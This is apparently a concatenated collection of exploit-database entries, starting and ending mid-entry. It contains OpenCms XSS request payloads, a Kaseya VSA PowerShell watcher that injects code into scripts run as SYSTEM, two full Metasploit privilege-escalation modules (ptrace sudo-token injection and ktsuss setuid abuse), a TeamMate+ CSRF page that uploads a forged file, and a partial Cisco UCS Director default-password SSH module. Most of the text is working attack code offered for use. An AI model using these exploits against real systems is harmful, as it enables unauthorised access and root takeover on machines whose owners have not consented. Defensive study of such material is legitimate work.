```
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
```
5. In Index sources > View field configuration > New field configuration
(Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
```
6. In Account Management > Import/Export user data (Reflected XSS):
- Affected resource oufqn:
POC:
```
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
HTTP/1.1
Host: example.com
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
```
7. In Account Management > Group Management > New Group (Stored XSS):
- Affected resources name.0 and description.0:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
```
8. In Account Management > Organizational Unit > Organizational Unit
Management > New sub organizational unit (Stored XSS):
- Affected resources parentOuDesc.0 and resources.0:
POC:
```
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
```
9. In Link Validator > External Link Validator > Validate External Links
(Reflected XSS):
- Affected resources reporttype, reportcontinuekey and title:
POC:
```
POST
/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks
HTTP/1.1
Host: example.com
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
```
10. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="inputDir.0"
.
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="destinationDir.0"
/whbo0"><script>alert(1)</script>nrbhd
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="imageGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="downloadGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="linkGallery.0"
[...]
```
11. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and
downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="inputDir.0"
gato
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="destinationDir.0"
testszfgw"><script>alert(1)</script>vqln7
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="imageGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="downloadGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="linkGallery.0"
test
[...]
```
Extended POCs: https://aetsu.github.io/OpenCms
# Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation
# Google Dork: N/A
# Date: 2-09-2019
# Exploit Author: NF
# Vendor Homepage: https://www.kaseya.com/products/vsa/
# Software Link: https://www.kaseya.com/products/vsa/
# Version: <= 9.5 agentmon.exe
# Tested on: Windows 10
# CVE : N/A
##Vulnerability##
This is not a new issue as such but more of the same in line with <a href="https://www.securityfocus.com/archive/1/541884/30/300/threaded">CVE-2017-12410</a> found by Filip Palian.
A fix was put in place for the original CVE; however, it was specific to binaries and not scripts.
The root cause of both issues is that a low-privileged group is granted excessive permissions on a folder used by an elevated process.
The Kaseya agent (agentmon.exe) runs as SYSTEM by default.
The agent also has a default working folder @ C:\kworking\
It will pull scripts and binaries to this folder and execute them from disk from the controlling web application.
By default the *Authenticated Users* group has all rights to this folder.
Scripts are written to disk however they are not checked for integrity prior to execution.
So the folder can be monitored for script files being dropped, and malicious code appended to them before the agent executes them.
##Proof of concept##
This PowerShell script will monitor the default working directory.
When a .ps1 script is dropped by a scheduled task or run from the VSA web application, the watcher appends the command "Write-Host 'injected content'" to it, which then runs as SYSTEM.
Change the Write-Host command to the code to be executed or update the script to target other script drops such as vb script.
Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts
<--script start-->
# Agent working folder to watch and the file pattern of interest.
$watchDir = 'c:\kworking'
$watchPattern = '*.ps1'

# Watch for new .ps1 files in the folder itself (no recursion), reacting to
# file-name and last-write notifications.
$watcher = New-Object IO.FileSystemWatcher $watchDir, $watchPattern
$watcher.IncludeSubdirectories = $false
$watcher.NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'

# On the first Created event, append a command to the dropped script and stop
# watching. The agent later executes the modified script.
# NOTE(review): Created fires as soon as the file appears, possibly before the
# agent has finished writing it; if the append hits a sharing violation a
# retry may be needed -- confirm on a live agent. EnableRaisingEvents is not
# set explicitly here (matches the original) -- confirm events fire as tested.
Register-ObjectEvent $watcher Created -SourceIdentifier FileCreated -Action {
    $droppedScript = $Event.SourceEventArgs.FullPath
    "`nWrite-Host 'injected content'" | Out-File -Append -FilePath $droppedScript -Encoding utf8
    Unregister-Event FileCreated
}
<--script end-->
##Timeline##
16-06-2019 :: Issue found
18-06-2019 :: security@ emailed requesting steps to disclose
30-06-2019 :: CERT contacted due to non response of vendor from official email address
31-06-2019 :: CERT still unable to contact vendor
07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor
20-08-2019 :: Vendor confirms receipt of details
27-08-2019 :: Email sent indicating intention to disclose due to lack of response
02-09-2019 :: No response through CERT. Findings published
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
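class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ptrace Sudo Token Privilege Escalation',
      'Description' => %q{
        This module attempts to gain root privileges by blindly injecting into
        the session user's running shell processes and executing commands by
        calling `system()`, in the hope that the process has valid cached sudo
        tokens with root privileges.
        The system must have gdb installed and permit ptrace.
        This module has been tested successfully on:
        Debian 9.8 (x64); and
        CentOS 7.4.1708 (x64).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'chaignc', # sudo_inject
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2019-03-24',
      'References' =>
        [
          ['EDB', '46989'],
          ['URL', 'https://github.com/nongiach/sudo_inject'],
          ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
          ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
          ['URL', 'https://lwn.net/Articles/393012/'],
          ['URL', 'https://lwn.net/Articles/492667/'],
          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform' => ['linux'],
      'Arch' =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Targets' => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork' => true,
          'WfsDelay' => 30
        },
      'DefaultTarget' => 0))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # Directory on the target where the payload is written (WritableDir option).
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Seconds to wait for each gdb injection attempt (TIMEOUT option).
  def timeout
    datastore['TIMEOUT']
  end

  # Write +data+ to +path+ on the target, replacing any existing file, and
  # register it for removal when the module finishes.
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Names of shells to look for: a built-in list plus the basename of every
  # non-comment entry in /etc/shells. Empty names are dropped.
  def shell_names
    names = %w[ash ksh csh dash bash zsh tcsh fish sh]
    read_file('/etc/shells').to_s.each_line do |line|
      entry = line.strip
      next if entry.empty? || entry.start_with?('#')
      names << entry.split('/').last
    end
    names.uniq.reject { |name| name.nil? || name.empty? }
  end

  # PIDs of running shell processes (deduplicated). pgrep is preferred because
  # it is restricted to the session user's uid; the pidof fallback has no such
  # filter, so it may also return shells owned by other users, which ptrace
  # will not let us attach to.
  def shell_pids
    names = shell_names
    pids = []
    if command_exists? 'pgrep'
      cmd_exec("pgrep '^(#{names.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
        pids << pid.strip
      end
    else
      names.each do |name|
        pidof(name).each { |pid| pids << pid.strip }
      end
    end
    pids.reject(&:empty?).uniq
  end

  # Preconditions for ptrace-based injection: Yama must not restrict ptrace,
  # SELinux must not deny it, and sudo plus gdb must be present. Returns
  # Detected rather than Vulnerable because the presence of a cached sudo
  # token cannot be verified without actually injecting.
  def check
    if yama_enabled?
      vprint_error 'YAMA ptrace scope is restrictive'
      return CheckCode::Safe
    end
    vprint_good 'YAMA ptrace scope is not restrictive'

    if command_exists? '/usr/sbin/getsebool'
      # Discard stderr rather than redirecting it with "2>1", which would
      # create a file named "1" in the working directory on the target.
      if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>/dev/null | /bin/grep -q on && echo true").to_s.include? 'true'
        vprint_error 'SELinux deny_ptrace is enabled'
        return CheckCode::Safe
      end
      vprint_good 'SELinux deny_ptrace is disabled'
    end

    unless command_exists? 'sudo'
      vprint_error 'sudo is not installed'
      return CheckCode::Safe
    end
    vprint_good 'sudo is installed'

    unless command_exists? 'gdb'
      vprint_error 'gdb is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gdb is installed'

    CheckCode::Detected
  end

  # Drop the payload, then inject "sudo chown/chmod <payload>" into each shell
  # process in turn; the first shell holding a valid sudo token makes the
  # payload setuid root, which is then executed.
  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # The payload relies on the setuid bit, which a nosuid mount ignores.
    if nosuid? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
    end

    print_status 'Searching for shell processes ...'
    pids = shell_pids
    if pids.empty?
      fail_with Failure::Unknown, 'Found no running shell processes'
    end
    print_status "Found #{pids.length} running shell processes"
    vprint_status pids.join(', ')

    # Upload payload
    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe

    # Commands evaluated inside the injected shell. `sudo -S` reads the
    # password from stdin, so the empty line from `echo` only succeeds when
    # that shell already holds a valid cached sudo token.
    cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"

    # Blindly call system() in each shell process
    pids.each do |pid|
      print_status "Injecting into process #{pid} ..."
      # gdb attaches via ptrace and evaluates system() in the target process.
      sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
      res = cmd_exec sudo_inject, nil, timeout
      vprint_line res unless res.to_s.strip.empty?

      next unless setuid? @payload_path

      print_good "#{@payload_path} setuid root successfully"
      print_status 'Executing payload...'
      res = cmd_exec "#{@payload_path} & echo "
      vprint_line res
      return
    end

    fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
  end

  # Remove the dropped payload as soon as the new session is available
  # (FileDropper cleanup still runs when the module ends).
  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end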
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
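class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ktsuss suid Privilege Escalation',
      'Description' => %q{
        This module attempts to gain root privileges by exploiting
        a vulnerability in ktsuss versions 1.4 and prior.
        The ktsuss executable is setuid root and does not drop
        privileges prior to executing user specified commands,
        resulting in command execution with root privileges.
        This module has been tested successfully on:
        ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
        ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'John Lightsey', # Discovery and exploit
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2011-08-13',
      'References' =>
        [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
      'Platform' => ['linux'],
      'Arch' =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Targets' => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'AppendExit' => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true,
          'PrependFork' => true
        },
      'DefaultTarget' => 0))
    register_options [
      # Description fixed: the option points at ktsuss, not staprun.
      OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # Path of the setuid ktsuss binary on the target (KTSUSS_PATH option).
  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  # Directory on the target where the payload is written (WritableDir option).
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Write +data+ to +path+ on the target, replacing any existing file, and
  # register it for removal when the module finishes.
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Upload +data+ to +path+ and make it executable.
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  # Name of the session user, as ktsuss -u expects it.
  def session_user
    cmd_exec 'whoami'
  end

  # Confirms ktsuss is setuid and that running `id` through it as the
  # current user yields uid=0, i.e. privileges are not dropped.
  def check
    unless setuid? ktsuss_path
      vprint_error "#{ktsuss_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ktsuss_path} is setuid"

    res = cmd_exec("#{ktsuss_path} -u #{session_user} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Drop the payload and run it through ktsuss, which executes it as root.
  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    # Backgrounded so the session is not blocked while the payload runs.
    res = cmd_exec "#{ktsuss_path} -u #{session_user} #{payload_path} & echo "
    vprint_line res
  end
end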
# Exploit Title : CraftCms Users information disclosure From uploaded File
# Author [Discovered By] : Mohammed Abdul Raheem
# Author's [Company Name] : TrekShield IT Solution
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
# Found Vulnerability On : 20-07-2019
# Vendor Homepage:https://craftcms.com/
# Software Information Link: https://github.com/craftcms/demo
# Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCmsv3 before 3.2.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : Sensitive information disclosure
# CVE : CVE-2019-14280
####################################################################
# Description about Software :
***************************
Craft is a flexible, user-friendly CMS for creating custom digital
experiences on the web and beyond.
####################################################################
# Vulnerability Description :
*****************************
When a user uploads an image to CraftCMS, the uploaded image's EXIF
metadata (including GPS geolocation data) is not stripped. As a result,
anyone who can download the image can obtain sensitive information about
the CraftCMS user who uploaded it, such as their geolocation and device
details (device name, version, software and software version).
# Impact :
***********
This vulnerability is CRITICAL and impacts all the craft's customer
base. This vulnerability violates the privacy of a User and shares
sensitive information of the user who uploads an image on CraftCMS.
# Steps To Validate :
*********************
1. Login to CraftCMS account.
2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets
3. Upload an image which has EXIF Geolocation Data in it.
4. Once the image is uploaded by CraftCMS and hosted on the server,
download the image file and check its properties. You can also use a
tool such as https://www.pic2map.com to view the embedded information.
# ATTACHED POC :
****************
https://youtu.be/s-fTdu8R3bU
# More Information Can be find here :
*************************************
https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23
###################################################################
# Discovered By Mohammed Abdul Raheem from TrekShield.com
Hello,
Please find the below vulnerability details,
---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery
(CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0)
# CVE : CVE-2019-10253
This is an article with PoC exploit code for the Wolters Kluwer TeamMate+
Cross-Site Request Forgery (CSRF) vulnerability.
---------------------------------------------------------------------------------------------------------------------------------
Title:
====
Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability
CVE:
====
CVE-2019-10253
Date:
====
02/09/2019 (dd/mm/yyyy)
Vendor:
======
Wolters Kluwer is a global leader in professional information, software
solutions, and services for the health, tax & accounting, finance, risk &
compliance, and legal sectors. We help our customers make critical
decisions every day by providing expert solutions that combine deep domain
knowledge with specialized technology and services.
Vendor link: http://www.teammatesolutions.com/about-us.aspx
Vulnerable Product:
==============
TeamMate+
TeamMate Global Audit Solutions, part of the Tax and Accounting Division of
Wolters Kluwer, helps professionals in all industries at organizations
around the world manage audit and compliance risks and business issues by
providing targeted, configurable, and efficient software solutions.
Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate
Analytics. Together, this ecosystem of solutions provides organizations
with the combined assurance they need to manage all aspects of risk
identification and assessment, electronic working paper creation and
management, controls framework management, and data analysis.
Abstract:
=======
A Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an
attacker to upload malicious/forged files to the TeamMate server, or replace
existing uploaded files with malicious/forged ones, by enticing an
authenticated user to visit an attacker-controlled page.
Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2
Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)
Exploitation-Technique:
=======================
Remote
Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE ID:
=======
CVE-2019-10253
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in
TeamMate+ which allows a remote attacker to modify application data (upload
malicious/forged files to the TeamMate server or replace existing uploaded
files with malicious/forged files) without the victim's knowledge, by enticing
an authenticated user to visit an attacker-controlled page/URL.
The specific flaw exists within the handling of requests to the
"DomainObjectDocumentUpload.ashx" handler. The application does not validate
an anti-CSRF token before processing the POST request, so a multipart upload
issued by the victim's browser from a third-party origin is accepted as long
as the session cookie accompanies it. (Whether the browser attaches that
cookie to a cross-site POST depends on its SameSite handling; this PoC
predates browsers that default cookies to SameSite=Lax.)
Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx
PoC Exploit code:
----------------------------------------------------------------------------
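<!--
  CSRF PoC for CVE-2019-10253 (TeamMate+ <= 3.1, Internal Version 21.0.0.0).
  When a browser that holds a live TeamMate+ session loads this page, it POSTs
  a multipart upload to DomainObjectDocumentUpload.ashx with the victim's
  cookies; the handler accepts it because no anti-CSRF token is checked.
  Replace <ServerIP> and the object IDs in the body (parentId, AssessmentId,
  ProjectId, ParentNodeType, DocumentParentObjectType) with values valid for
  the target instance - they are not stable across deployments.
  Note: this is a cross-site request, so the session cookie is only attached
  if the browser still sends cookies on cross-site POSTs (SameSite=None, or
  pre-SameSite-Lax defaults).
-->
<html>
<body onload="submitRequest()">
<script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  // Each header value must stay on one line; the original listing had the
  // Content-Type and two body lines wrapped by the mail client, which is a
  // JavaScript syntax error when pasted as-is.
  xhr.open("POST", "https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx", true);
  // Accept, Accept-Language and a multipart/form-data Content-Type are
  // CORS-safelisted headers, so the browser should send this without a
  // preflight; the (unreadable) response does not matter for CSRF.
  xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
  // Attach the victim's session cookie to the cross-site request.
  xhr.withCredentials = true;
  var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
    "\r\n" +
    "0\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"parentId\"\r\n" +
    "\r\n" +
    "1373\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
    "\r\n" +
    "34\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
    "\r\n" +
    "1106\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
    "\r\n" +
    "50\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"DocumentParentObjectType\"\r\n" +
    "\r\n" +
    "90\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    // The uploaded "document": a .txt name with an executable MIME type and an
    // MZ-style header, demonstrating that content/type are not validated.
    "Content-Disposition: form-data; name=\"files[]\"; filename=\"Report.txt\"\r\n" +
    "Content-Type: application/x-msdownload\r\n" +
    "\r\n" +
    "MZP\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
  // Send the multipart body as raw bytes so it goes out byte-for-byte.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>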
----------------------------------------------------------------------------
Credits:
=======
Bhadresh Patel
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
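class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  # Cisco UCS Director ships with an 'scpuser' account whose password is also
  # 'scpuser' (CVE-2019-1935). This module logs in over SSH with those (or the
  # user-supplied) credentials and hands the live session to a cmd_interact
  # payload. Tested against the 6.6.0 and 6.7.0 virtual appliances only.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cisco UCS Director default scpuser password",
      'Description'    => %q{
        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
        via SSH.
        This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-1935' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Cisco UCS Director < 6.7.2.0', {} ],
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 21 2019'
    ))

    # Defaults are the vendor's hard-coded credential pair; both stay editable
    # so the module can be pointed at a rotated or different account.
    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true, "Username to login with", 'scpuser']),
        OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']),
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Target host, as configured in the datastore.
  def rhost
    datastore['RHOST']
  end

  # Target SSH port, as configured in the datastore.
  def rport
    datastore['RPORT']
  end

  # Attempt a single SSH password (or keyboard-interactive) login.
  #
  # @param user [String] account name
  # @param pass [String] password
  # @return [Net::SSH::CommandStream, nil] a stream wrapping the live session,
  #   or nil on any failure. Every failure path reports its reason; the
  #   original left a Rex::ConnectionError silent and let the authentication
  #   failure fall through, which made misses hard to diagnose.
  def do_login(user, pass)
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :password        => pass,
      :proxy           => ssh_socket_factory,
      :non_interactive => true,
      # We are logging in with a known default credential; the appliance's host
      # key is not something we can pin ahead of time, so do not verify it.
      :verify_host_key => :never
    }
    opts[:verbose] = :debug if datastore['SSH_DEBUG']

    ssh = nil
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError => e
      print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
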